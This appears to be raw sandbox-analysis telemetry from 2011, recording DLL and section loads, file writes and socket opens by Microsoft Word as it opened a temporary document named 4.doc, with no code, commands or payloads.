    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 472483361
    Thread delayed Time: 1 TID: 1412 success or wait 472613169
    Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 476371457
    Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1020000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 476376330
    Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 476391050
    Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: AF0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 476395734
    Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 Access: write Type: unknown Baseaddress: AF0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 476413380
    Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_16384 Access: write Type: unknown Baseaddress: B00000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 476416468
    Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 Access: write Type: unknown Baseaddress: B10000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 476419090
    Section loaded Path: \KnownDlls\RASAPI32.dll Access: write and read and execute Type: unknown Baseaddress: B10000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 476463873
    Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid success or wait 476464510
    Section loaded Path: \KnownDlls\rasman.dll Access: write and read and execute Type: unknown Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid object name not found 476467131
    Section loaded Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 476467785
    Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 476469860
    Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 476470457
    Section loaded Path: \KnownDlls\TAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid object name not found 476474036
    Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid success or wait 476474605
    Section loaded Path: \KnownDlls\rtutils.dll Access: write and read and execute Type: unknown Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid object name not found 476477285
    Section loaded Path: C:\WINDOWS\system32\rtutils.dll Access: query and write and read and execute Type: image Baseaddress: 76E80000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 476477882
    Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 76E80000 Size: 57344 Protection: read write Mapped to pid: own pid object name not found 476480812
    Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 476481450
    Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: B20000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 476506928
    Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 476529936
    File opened Path: c:\autoexec.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 476578577
    File opened Path: c:\autoexec.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 476610646
    Section loaded Path: \KnownDlls\sensapi.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 476624289
    Section loaded Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 476626636
    Section loaded Path: \BaseNamedObjects\SENS Information Cache Access: read Type: unknown Baseaddress: B20000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 476641825
    Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 476722022
    Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 476726698
    Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 476754340
    Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 476755323
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 476877189
    Section loaded Path: \BaseNamedObjects\Local\UrlZonesSM_Administrator Access: query and write and read Type: commit Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid object name exists 476913785
    Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 477019632
    Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 477024545
    Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: B80000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 477123155
    Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 477146740
    File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: no options Attributes: none Content Overwritten: true success or wait 477172999
    File opened Path: \Device\Afd\AsyncConnectHlp Access: synchronize and generic read and generic write Options: no options Attributes: none Content Overwritten: true success or wait 477227052
    Section loaded Path: \KnownDlls\msapsspc.dll Access: write and read and execute Type: unknown Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 478343743
    Section loaded Path: C:\WINDOWS\system32\msapsspc.dll Access: query and write and read and execute Type: image Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 478345896
    Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 478351786
    Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 478353958
    Section loaded Path: \KnownDlls\schannel.dll Access: write and read and execute Type: unknown Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 478377720
    Section loaded Path: C:\WINDOWS\system32\schannel.dll Access: query and write and read and execute Type: image Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid success or wait 478379476
    Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid object name not found 478387500
    Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 478389269
    Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 478394023
    Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 478395844
    Section loaded Path: \KnownDlls\digest.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 478422273
    Section loaded Path: C:\WINDOWS\system32\digest.dll Access: query and write and read and execute Type: image Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 478424306
    Section loaded Path: \KnownDlls\msnsspc.dll Access: write and read and execute Type: unknown Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 478473817
    Section loaded Path: C:\WINDOWS\system32\msnsspc.dll Access: query and write and read and execute Type: image Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid success or wait 478475846
    Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid object name not found 478484665
    Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 478486477
    Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: EA0000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 478559612
    Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: query and write and read and execute Type: image Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 478565414
    Section loaded Path: \KnownDlls\cryptdll.dll Access: write and read and execute Type: unknown Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 478570187
    Section loaded Path: C:\WINDOWS\system32\cryptdll.dll Access: query and write and read and execute Type: image Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 478575858
    File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: no options Attributes: none Content Overwritten: true success or wait 483203236
    + Sections
    + General
    Start time: 04:13:17
    Start date: 13/12/2011
    Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
    Commandline: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc
    Imagebase: 0x30000000
    File size: 12047560 bytes
    MD5 hash: 5FEAF6AB43AA477597F9F8DB0E8CB69C
    File Activities:
    + File deleted
    File Path Completion Count Source Address
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC success or wait 2 300D26C2
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 1 300D26C2
    + File renamed
    Old File Path New File Path Completion Count Source Address
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~WRI0000 unknown success or wait 1 300AC24B
    + File written
    File Path Offset Length Value Completion Count Source Address
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc none 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 300408C8
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc none 108 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 48 00 00 00 00 00 3E 00 02 02 00 00 06 00 09 00 34 00 00 00 00 00 90 00 90 00 00 00 00 00 0F 00 00 00 FF FF FF 00 00 00 00 00 00 00 14 00 14 00 00 00 00 00 00 00 02 63 78 00 C8 00 00 00 00 00 14 00 00 00 00 00 90 00 90 00 80 00 16 00 00 00 success or wait 1 300408C8
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC none 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 2 300408C8
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC none 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 08 00 00 00 02 00 48 00 42 00 00 00 61 00 00 00 09 00 00 00 0F 00 00 00 05 00 00 00 16 00 00 00 09 00 00 00 01 00 1C 2E D3 00 04 A4 2E D3 00 02 FC 2E D3 00 09 54 FC 8C 00 01 A0 FC 8C 00 08 FC FD 8C 00 0D success or wait 2 300408C8
    + Other file operations
    File Path Disposition Data Ascii Data Completion Count Source Address
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC PositionInformation Offset: 0 success or wait 6 301CCD6E
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
    \KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
    \KnownDlls\psapi.dll write and read and execute unknown 870000 57344 own pid read write object name not found 1
    C:\WINDOWS\system32\psapi.dll query and write and read and execute image 76BF0000 45056 own pid read write success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8D0000 774144 own pid execute success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8D0000 774144 own pid readonly success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19211106360 query and write and read and execute and extend size unknown A20000 126976 own pid read write success or wait 1
    \KnownDlls\uxtheme.dll write and read and execute unknown A20000 126976 own pid read write object name not found 1
    C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
    C:\WINDOWS\system32\msctf.dll write and read and execute commit A60000 299008 own pid execute success or wait 1
    C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
    \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
    \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A60000 262144 own pid read write success or wait 1
    \KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and read commit AA0000 180224 own pid readonly success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and read commit AA0000 180224 own pid readonly success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AB0000 1753088 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AB0000 1753088 own pid readonly success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg20321106360 query and write and read and execute and extend size unknown C60000 126976 own pid read write success or wait 1
    \KnownDlls\msi.dll write and read and execute unknown C60000 126976 own pid read write object name not found 1
    C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
    C:\WINDOWS\system32\rpcss.dll write and read and execute commit D00000 401408 own pid execute success or wait 1
    \KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
    C:\WINDOWS\system32\shell32.dll read commit D00000 8462336 own pid readonly success or wait 1
    \KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
    C:\WINDOWS\system32\comctl32.dll read commit D00000 618496 own pid readonly success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit DB0000 966656 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 962560 own pid read write success or wait 1
    \KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E30000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E30000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E30000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E30000 159744 own pid execute success or wait 1
    \KnownDlls\CLBCATQ.DLL write and read and execute unknown E30000 159744 own pid execute object name not found 1
    C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
    \KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
    C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown E50000 4096 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL write and read and execute commit E50000 368640 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL query and write and read and execute image 10000000 372736 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve 10000000 372736 own pid read write object name exists 1
    \KnownDlls\SETUPAPI.dll write and read and execute unknown 10000000 372736 own pid read write object name not found 1
    C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap325F0 query and write and read reserve FE0000 4194304 own pid read write success or wait 1
    \BaseNamedObjects\DFMap0-206324 query and write and read commit 13E0000 524288 own pid read write success or wait 1
    \BaseNamedObjects\DfRoot0000325F0 query and write and read commit 1460000 4096 own pid read write success or wait 1
    \BaseNamedObjects\DFMap0-206340 query and write and read commit 1470000 524288 own pid read write success or wait 1
    \KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
    \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 14F0000 8192 own pid read write success or wait 1
    \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1500000 8192 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read and execute and extend size unknown 1560000 126976 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19531106360 query and write and read and execute and extend size unknown 1560000 126976 own pid read write success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1580000 159744 own pid execute success or wait 1
    \BaseNamedObjects\Global\RotHintTable read unknown 1580000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\winlogon.exe write and read and execute commit 1590000 507904 own pid execute success or wait 1
    \KnownDlls\xpsp2res.dll write and read and execute unknown 1590000 507904 own pid execute object name not found 1
    C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 1590000 2904064 own pid read write conflicting addresses 1
    \KnownDlls\SXS.DLL write and read and execute unknown 1590000 2904064 own pid read write object name not found 1
    C:\WINDOWS\system32\sxs.dll query and write and read and execute image 7E720000 720896 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read and execute and extend size unknown 1A80000 126976 own pid read write success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1AA0000 159744 own pid execute success or wait 1
    \KnownDlls\LINKINFO.dll write and read and execute unknown 76380000 20480 own pid read write object name not found 1
    C:\WINDOWS\system32\linkinfo.dll query and write and read and execute image 76980000 32768 own pid read write success or wait 1
    \KnownDlls\ntshrui.dll write and read and execute unknown 76980000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\ntshrui.dll query and write and read and execute image 76990000 151552 own pid read write success or wait 1
    \KnownDlls\ATL.DLL write and read and execute unknown 76990000 151552 own pid read write object name not found 1
    C:\WINDOWS\system32\atl.dll query and write and read and execute image 76B20000 69632 own pid read write success or wait 1
    \KnownDlls\NETAPI32.dll write and read and execute unknown 76B20000 69632 own pid read write object name not found 1
    C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
    C:\WINDOWS\system32\ntshrui.dll read commit 1AB0000 143360 own pid readonly success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB..JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.Shared.SFM.AJH query and write and read and execute and extend size unknown 1AF0000 524288 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.B.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.C.JOJAC query and write and read commit 1AD0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.D.JOJAC query and write and read commit 1B70000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.E.JOJAC query and write and read commit 1B80000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.F.JOJAC query and write and read commit 1B90000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.G.JOJAC query and write and read commit 1BA0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.H.JOJAC query and write and read commit 1BB0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.I.JOJAC query and write and read commit 1BC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.J.JOJAC query and write and read commit 1BD0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.K.JOJAC query and write and read commit 1BE0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.L.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.M.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.N.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.O.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.P.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.AB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.BB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.CB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.DB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.EB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.O.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.P.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.AB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.BB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.CB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.DB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.EB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.FB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.GB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.HB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.FB.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.GB.ELKAC query and write and read commit 1AD0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.HB.ELKAC query and write and read commit 1B70000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.IB.ELKAC query and write and read commit 1B80000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.JB.ELKAC query and write and read commit 1B90000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.KB.ELKAC query and write and read commit 1BA0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.LB.ELKAC query and write and read commit 1BB0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.MB.ELKAC query and write and read commit 1BC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.NB.ELKAC query and write and read commit 1BD0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.OB.ELKAC query and write and read commit 1BE0000 4096 own pid read write success or wait 1
